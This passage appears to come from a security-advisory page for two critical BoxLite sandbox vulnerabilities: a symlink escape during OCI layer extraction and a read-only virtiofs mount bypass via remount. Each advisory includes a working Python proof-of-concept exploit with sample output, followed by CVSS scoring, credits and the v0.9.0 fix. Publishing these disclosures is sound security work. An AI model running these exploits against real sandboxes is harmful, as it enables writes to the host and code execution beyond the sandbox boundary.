escape/boxlite_host_escape/ (resolves to /tmp/boxlite_host_escape/) [3] FILE escape/boxlite_host_escape/pwned.txt (resolves to /tmp/…/pwned.txt) [4] FILE etc/os-release (legitimate-looking decoy entries) """ payload = ( "===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n" f"Written at: {time.strftime('%Y-%m-%d %H:%M:%S')}\n" f"Target: {TARGET_FILE}\n" "========================================================\n" ).encode() buf = io.BytesIO() with tarfile.open(fileobj=buf, mode="w") as tf: add_entry(tf, "escape", tarfile.SYMTYPE, linkname="/tmp", mode=0o777) add_entry(tf, "escape/boxlite_host_escape", tarfile.DIRTYPE, mode=0o755) add_entry( tf, "escape/boxlite_host_escape/pwned.txt", tarfile.REGTYPE, data=payload ) add_entry( tf, "etc/os-release", tarfile.REGTYPE, data=b"ID=alpine\nVERSION_ID=3.19.0\n", ) return buf.getvalue() # ── Step 2: Build OCI image layout ─────────────────────────────────────────── def build_oci_layout(out_dir: str) -> None: blobs = os.path.join(out_dir, "blobs", "sha256") os.makedirs(blobs, exist_ok=True) def write_blob(data: bytes) -> tuple[str, int]: dgst = sha256hex(data) with open(os.path.join(blobs, dgst), "wb") as f: f.write(data) return dgst, len(data) layer_bytes = build_layer_tar() layer_dgst, layer_sz = write_blob(layer_bytes) config_bytes = json.dumps( { "architecture": "amd64", "os": "linux", "config": {"Cmd": ["/bin/sh"]}, "rootfs": {"type": "layers", "diff_ids": [f"sha256:{layer_dgst}"]}, } ).encode() cfg_dgst, cfg_sz = write_blob(config_bytes) manifest_bytes = json.dumps( { "schemaVersion": 2, "mediaType": "application/vnd.oci.image.manifest.v1+json", "config": { "mediaType": "application/vnd.oci.image.config.v1+json", "digest": f"sha256:{cfg_dgst}", "size": cfg_sz, }, "layers": [ { "mediaType": "application/vnd.oci.image.layer.v1.tar", "digest": f"sha256:{layer_dgst}", "size": layer_sz, } ], } ).encode() mf_dgst, mf_sz = write_blob(manifest_bytes) with open(os.path.join(out_dir, "index.json"), "w") as f: json.dump( { "schemaVersion": 2, "manifests": [ { "mediaType": "application/vnd.oci.image.manifest.v1+json", "digest": f"sha256:{mf_dgst}", "size": mf_sz, "annotations": {"org.opencontainers.image.ref.name": "latest"}, } ], }, f, ) with open(os.path.join(out_dir, "oci-layout"), "w") as f: json.dump({"imageLayoutVersion": "1.0.0"}, f) print(f" layer sha256:{layer_dgst[:16]}… ({layer_sz} B)") print(f" config sha256:{cfg_dgst[:16]}… ({cfg_sz} B)") print(f" manifest sha256:{mf_dgst[:16]}… ({mf_sz} B)") # ── Main ────────────────────────────────────────────────────────────────────── async def main(): print("=" * 60) print(" PoC: BoxLite OCI Layer Extraction Symlink Escape") print("=" * 60) # Clean up previous run artifacts for path in [TARGET_FILE, "/tmp/boxlite_host_escape", OCI_LAYOUT_DIR]: if os.path.isfile(path): os.remove(path) elif os.path.isdir(path): shutil.rmtree(path) # [1] Build malicious OCI image print(f"\n[1] Building malicious OCI image → {OCI_LAYOUT_DIR}") build_oci_layout(OCI_LAYOUT_DIR) # [2] Show crafted tar entries print("\n[2] Malicious layer tar entries:") with open(os.path.join(OCI_LAYOUT_DIR, "index.json")) as f: idx = json.load(f) mf_dgst = idx["manifests"][0]["digest"].split(":")[1] with open(os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", mf_dgst)) as f: mf = json.load(f) lyr_dgst = mf["layers"][0]["digest"].split(":")[1] lyr_data = open( os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", lyr_dgst), "rb" ).read() with tarfile.open(fileobj=io.BytesIO(lyr_data)) as tf: for m in tf.getmembers(): tstr = { tarfile.REGTYPE: "FILE ", tarfile.SYMTYPE: "SYMLINK", tarfile.DIRTYPE: "DIR ", }.get(m.type, f"?{m.type} ") suffix = f" -> {m.linkname}" if m.issym() else "" print(f" {tstr} {m.name}{suffix}") # [3] Confirm target absent before exploit print(f"\n[3] Pre-exploit — target exists? {os.path.exists(TARGET_FILE)}") # [4] Trigger extraction (vulnerability fires before VM starts) print(f"\n[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…)") import boxlite try: async with boxlite.SimpleBox(rootfs_path=OCI_LAYOUT_DIR) as box: r = await box.exec("sh", "-c", "echo ok") print(f" VM stdout: {r.stdout.strip()}") except Exception as e: # Box may fail to start (incomplete rootfs) — that's fine; # the symlink escape occurs during layer extraction, before VM launch. print(f" Box error (expected): {type(e).__name__}: {e}") # [5] Verify host write print(f"\n[5] Post-exploit — target exists? {os.path.exists(TARGET_FILE)}") if os.path.exists(TARGET_FILE): print(f"\n VULNERABLE — host file written successfully!") print(f" Path: {TARGET_FILE}") print(open(TARGET_FILE).read()) else: print("\n NOT VULNERABLE (or already patched)") if __name__ == "__main__": asyncio.run(main()) ``` This script constructs a malicious OCI image and passes it to the SimpleBox function via rootfs_path to create a container. In the malicious image, a symlink is first created pointing `escape` to `/tmp`, and then files are written under `escape`, thereby achieving file writes to the root filesystem. Sample output: ``` $ python3 poc_symlink_escape.py ============================================================ PoC: BoxLite OCI Layer Extraction Symlink Escape ============================================================ [1] Building malicious OCI image → /tmp/malicious_oci_layout layer sha256:a1e8b4de11d64fce… (10240 B) config sha256:8e245c2c65565998… (191 B) manifest sha256:2dad6671e78d8093… (415 B) [2] Malicious layer tar entries: SYMLINK escape -> /tmp DIR escape/boxlite_host_escape FILE escape/boxlite_host_escape/pwned.txt FILE etc/os-release [3] Pre-exploit — target exists? False [4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…) Box error (expected): RuntimeError: internal error: Container init failed: Failed to start container: internal error: Failed to create container b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54 at bundle /run/boxlite/containers/b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54: failed to create container: exec process failed with error error in executing process : PATH environment variable is not set [5] Post-exploit — target exists? True VULNERABLE — host file written successfully! Path: /tmp/boxlite_host_escape/pwned.txt ===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE ===== Written at: ... Target: /tmp/boxlite_host_escape/pwned.txt ======================================================== ``` #### Impact An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. #### Score Severity: Critical, Score: 9.7, rationale as follows: - AV:N — The attacker can distribute the malicious image over the network, tricking users into pulling and using it - AC:L — This is a logic vulnerability that requires no complex exploitation - PR:N — The attacker does not need any additional privileges to exploit this vulnerability - UI:R — The attacker needs to trick the victim into using the maliciously crafted image - S:C — The attacker can leverage the vulnerability to achieve arbitrary command execution on the host, extending the impact to the host operating system and crossing the security boundary - C:H/I:H/A:H — The attacker can leverage the vulnerability to gain RCE capability on the host, posing a significant threat to confidentiality, integrity, and availability #### Credit This vulnerability was discovered by: - XlabAI Team of Tencent Xuanwu Lab - Atuin Automated Vulnerability Discovery Engine If there are any questions regarding the vulnerability details, please feel free to reach out to BoxLite for further discussion by emailing xlabai@tencent.com. #### Note Note that Boxlite follows the industry-standard **90+30 disclosure policy** (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.
CVE-2026-46695criMay 21, 2026
Boxlite Ai
Boxlite
risk 0.59cvss —epss —
#### Summary Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. One of the core security features claimed by Boxlite is the ability to mount host directories in read-only mode (read_only=True) into the VM via the virtiofs protocol (a host-guest shared filesystem protocol designed specifically for virtual machines), so that untrusted code can only read but not modify host data. Since the underlying function of the lightweight VM library libkrun used by Boxlite does not support mounting in read-only mode, Boxlite chooses to implement read-only by adding the MS_RDONLY flag when mounting the directory after the VM starts. However, because Boxlite does not restrict the kernel capabilities available inside the container, malicious code can remount the directory in rw mode, thereby gaining write access to that directory. This allows malicious code to perform arbitrary write operations on directories that should be read-only. In typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks. #### Details 1. User-Facing API Documents Read-Only Guarantee **File:** `boxlite/src/runtime/options.rs` **Function:** `VolumeSpec` (line 223) **Code:** ```rust /// Filesystem mount specification. pub struct VolumeSpec { pub host_path: String, pub guest_path: String, pub read_only: bool, // <-- operator sets this to restrict guest write access } ``` **Issue:** The `read_only` field is documented (and in user-facing guides) as preventing the guest from writing to the host directory. The guarantee is "Agent can read but not write." This expectation is not met. 2. read_only Stored in FsShare — Passed to krun Without Enforcement **File:** `boxlite/src/vmm/krun/engine.rs` **Function:** `Krun::create()` (line 334) **Code:** ```rust for share in config.fs_shares.shares() { let path_str = share.host_path.to_str().ok_or_else(|| { ... })?; tracing::info!( " {} → {} ({})", share.tag, share.host_path.display(), if share.read_only { "ro" } else { "rw" } // Logged but NOT passed to krun ); ctx.add_virtiofs(&share.tag, path_str)?; // <-- read_only silently dropped } ``` **Issue:** `share.read_only` is logged as "ro" or "rw" but is never passed to `add_virtiofs`. The actual hypervisor call receives only tag and host path. 3. Hypervisor FFI Has No Read-Only Parameter **File:** `boxlite/src/vmm/krun/context.rs` **Function:** `add_virtiofs()` (line 423) **Code:** ```rust pub unsafe fn add_virtiofs(&self, mount_tag: &str, host_path: &str) -> BoxliteResult<()> { let host_path_c = CString::new(host_path) .map_err(|e| BoxliteError::Engine(format!("invalid host path: {e}")))?; let mount_tag_c = CString::new(mount_tag) .map_err(|e| BoxliteError::Engine(format!("invalid mount tag: {e}")))?; check_status("krun_add_virtiofs", unsafe { krun_add_virtiofs(self.ctx_id, mount_tag_c.as_ptr(), host_path_c.as_ptr()) // No read_only parameter — libkrun exposes the share as read-write to the guest }) } ``` **Issue:** `krun_add_virtiofs` in the FFI (`deps/libkrun-sys/src/lib.rs:35`) takes only `ctx_id`, `mount_tag`, and `host_path`. There is no read-only flag. Libkrun exposes the virtiofs share to the guest with full read-write access at the device level. 4. Read-Only Enforcement Is Delegated to Guest Agent (Zone 0) **File:** `boxlite/src/volumes/guest_volume.rs` **Function:** `build_guest_mounts()` (line 184) **Code:** ```rust for entry in &self.fs_shares { let mount_point = entry.guest_path.as_deref().unwrap_or(""); volumes.push(VolumeConfig::virtiofs( &entry.tag, mount_point, entry.read_only, // <-- sent to guest agent as instruction entry.container_id.clone(), )); } ``` **Issue:** The `read_only` flag is sent to the guest agent via gRPC as a mount instruction. The guest agent is expected to pass `-o ro` to the mount syscall. But the guest runs Zone 0 code — untrusted, assumed malicious. A compromised or malicious guest simply ignores this instruction. 5. FFI Declaration Confirms No Read-Only Variant Exists **File:** `boxlite/deps/libkrun-sys/src/lib.rs` **Function:** `krun_add_virtiofs` extern declaration (line 35) **Code:** ```rust extern "C" { pub fn krun_add_virtiofs( ctx_id: u32, mount_tag: *const c_char, host_path: *const c_char, ) -> i32; // No krun_add_virtiofs_ro or equivalent declared } ``` **Issue:** There is no alternative read-only virtiofs FFI function declared. The entire codebase has no `krun_add_virtiofs_ro` or read-only parameter variant. Enforcement at the hypervisor level does not exist. 6. OCI Spec Builder Grants All Capabilities **File:** `guest/src/container/capabilities.rs` **Function:** `all_capabilities()` (line 19) **Code:** ```rust pub fn all_capabilities() -> HashSet { [ // ... Capability::SysModule, // 16: load/unload kernel modules Capability::SysRawio, // 17: perform I/O port operations Capability::SysAdmin, // 21: various admin operations Capability::NetAdmin, // 12: network administration Capability::NetRaw, // 13: use RAW/PACKET sockets Capability::MacOverride, // 32: override MAC Capability::Bpf, // 39: BPF operations // ... all 41 capabilities ] .into_iter() .collect() } ``` **Issue:** Returns all 41 capabilities including the most dangerous ones, like `Capability::SysAdmin`. The function comment itself says "maximum compatibility but reduced security isolation." #### PoC 1. Install Boxlite following the official tutorial. 2. Run the following Python script: ```python import asyncio import os import tempfile import sys from boxlite import Boxlite, BoxOptions async def run(box, cmd): """Run shell command via native box.exec API.""" execution = await box.exec("sh", ["-c", cmd], None) stdout_stream = execution.stdout() stderr_stream = execution.stderr() stdout_lines, stderr_lines = [], [] async def read_stdout(): async for line in stdout_stream: stdout_lines.append(line if isinstance(line, str) else line.decode('utf-8', errors='replace')) async def read_stderr(): async for line in stderr_stream: stderr_lines.append(line if isinstance(line, str) else line.decode('utf-8', errors='replace')) await asyncio.gather(read_stdout(), read_stderr()) result = await execution.wait() return { 'exit_code': result.exit_code, 'stdout': ''.join(stdout_lines), 'stderr': ''.join(stderr_lines), } async def main(): # Step 1: Set up host directory with a read-only file host_dir = tempfile.mkdtemp(prefix="virtiofs_ro_poc_") ro_file = os.path.join(host_dir, "read_only.txt") with open(ro_file, "w") as f: f.write("original content\n") print(f"[+] Step 1: Host directory created: {host_dir}") print(f" read_only.txt: {open(ro_file).read().strip()}") print() guest_mount = "/mnt/sensitive" print(f"[+] Step 2: Launching BoxLite VM with:") print(f" volumes=[('{host_dir}', '{guest_mount}', True)] # read_only=True") print() try: runtime = Boxlite.default() opts = BoxOptions( image="alpine:latest", volumes=[(host_dir, guest_mount, True)], # <-- read_only=True memory_mib=512, cpus=1, auto_remove=True, ) box = await runtime.create(opts) async with box: print("[+] Step 3: VM booted. Checking virtiofs mount state...") r = await run(box, f"cat /proc/mounts | grep sensitive") print(f" /proc/mounts: {r['stdout'].strip()}") print() print("[+] Step 4: Testing write protection (initial state)...") r2 = await run(box, f"echo 'modified content' > {guest_mount}/read_only.txt 2>&1; echo write_exit:$?") out = r2['stdout'].strip() print(f" Write attempt: {out}") if "Read-only" in out or "read-only" in out: print(f" [OK] Initially blocked - client-side MS_RDONLY is active") print() print("[!!!] Step 5: ATTACK - Bypassing read-only via remount...") r3 = await run(box, f"mount -o remount,rw {guest_mount} 2>&1; echo remount_exit:$?") print(f" Remount result: {r3['stdout'].strip()}") r4 = await run(box, f"cat /proc/mounts | grep sensitive") print(f" Mount flags after: {r4['stdout'].strip()}") print() print("[!!!] Step 6: Writing to 'read-only' mount after bypass...") r5 = await run(box, f"echo 'modified content' > {guest_mount}/read_only.txt 2>&1; echo write_exit:$?") print(f" Write result: {r5['stdout'].strip()}") r6 = await run(box, f"cat {guest_mount}/read_only.txt") print(f" File content inside guest: {r6['stdout'].strip()}") print() print("[+] Step 7: HOST VERIFICATION") content = open(ro_file).read().strip() print(f" read_only.txt on host: {content}") print() print("FINAL RESULT:") print() if content == "modified content": print(" [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE") else: print(" [?] Bypass did not produce host-side writes.") except Exception as e: print(f"[-] Error: {e}") import traceback traceback.print_exc() finally: import shutil try: shutil.rmtree(host_dir) print(f"\n[+] Cleanup: removed {host_dir}") except: pass asyncio.run(main()) ``` This script mounts a directory in read-only mode into the sandbox and attempts to exploit the vulnerability to modify a file in that directory. Expected output: ``` $ python poc.py [+] Step 1: Host directory created: /tmp/virtiofs_ro_poc_93fdis21 read_only.txt: original content [+] Step 2: Launching BoxLite VM with: volumes=[('/tmp/virtiofs_ro_poc_93fdis21', '/mnt/sensitive', True)] # read_only=True [+] Step 3: VM booted. Checking virtiofs mount state... /proc/mounts: uservol0 /mnt/sensitive virtiofs ro,relatime 0 0 [+] Step 4: Testing write protection (initial state)... Write attempt: write_exit:1 [!!!] Step 5: ATTACK - Bypassing read-only via remount... Remount result: remount_exit:0 Mount flags after: uservol0 /mnt/sensitive virtiofs rw,relatime 0 0 [!!!] Step 6: Writing to 'read-only' mount after bypass... Write result: write_exit:0 File content inside guest: modified content [+] Step 7: HOST VERIFICATION read_only.txt on host: modified content FINAL RESULT: [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE [+] Cleanup: removed /tmp/virtiofs_ro_poc_93fdis21 ``` #### Impact Malicious code can perform arbitrary write operations on directories that should be read-only. In typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks. #### Score Severity: Critical, Score: 10.0, rationale as follows: - **AV:N** — Malicious code can be transmitted through networks, such as code written by large language models. - **AC:L** — No special conditions or race conditions are required. The attacker simply executes a `mount -o remount,rw` command inside the container. `CAP_SYS_ADMIN` is granted by default, and the attack is deterministic and trivially reproducible. - **PR:N** — The attacker needs the ability to execute arbitrary code inside the Boxlite sandbox, which is the fundamental use case of Boxlite (running untrusted code). - **UI:N** — No user interaction is required. Malicious code inside the container can autonomously exploit this vulnerability without any action from the host operator. - **S:C** — The vulnerability allows the attacker to cross the sandbox trust boundary and impact the host system. The vulnerable component is the Boxlite sandbox isolation mechanism, but the impacted component is the host filesystem. - **C:H** — With write access to host directories, the attacker can plant malicious code that will be executed by the host, leading to full compromise of sensitive host data including credentials, API keys, user code, and configuration files mounted into the container. - **I:H** — The attacker gains full write access to host directories explicitly intended to be read-only, allowing arbitrary modification of host files including planting backdoors, modifying virtual environments for supply chain attacks, and altering credentials and configuration files. - **A:N** — The vulnerability primarily enables unauthorized write access. The host system and Boxlite service continue to function; no distinct availability impact mechanism exists beyond secondary consequences of write access. #### Credit This vulnerability was discovered by: - XlabAI Team of Tencent Xuanwu Lab - Atuin Automated Vulnerability Discovery Engine CVE and credit are preferred. If there are any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com. #### Note Note that BoxLite follows the industry-standard **90+30 disclosure policy** (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented. #### Resolution Fixed in **v0.9.0** by PR #454 (commit `2c26968e`), released 2026-04-29, with defense-in-depth across three layers: 1. **Hypervisor-level read-only enforcement.** virtio-fs shares are now created via `krun_add_virtiofs3` (libkrun v1.18.0) with the `read_only` flag passed through, so the share is read-only at the virtio-fs device — before any request reaches the guest kernel. A malicious guest `mount -o remount,rw` can no longer reach host data even if it regained `CAP_SYS_ADMIN`. 2. **Capability restriction.** Containers now receive the 14 Docker-default capabilities, explicitly excluding `CAP_SYS_ADMIN` (and `CAP_NET_ADMIN`, `CAP_SYS_MODULE`, `CAP_SYS_RAWIO`, `CAP_MAC_OVERRIDE`), so the remount in the PoC fails with `EPERM`. 3. **TSI network isolation.** When the network is disabled, the implicit vsock is replaced with an explicit vsock with no TSI features, closing a related guest→host socket-forwarding path. Regression coverage: `src/boxlite/tests/security_enforcement.rs` (Rust core) and `sdks/python/tests/test_readonly_volume_remount.py` (Python SDK) both replay the PoC remount attack and assert it fails. **Remediation:** upgrade to boxlite **0.9.0 or later** (all SDKs: PyPI `boxlite`, npm `@boxlite-ai/boxlite`, Go module `github.com/boxlite-ai/boxlite/sdks/go`, crates.io `boxlite` / `boxlite-cli`). There is no workaround for affected versions; upgrade is required.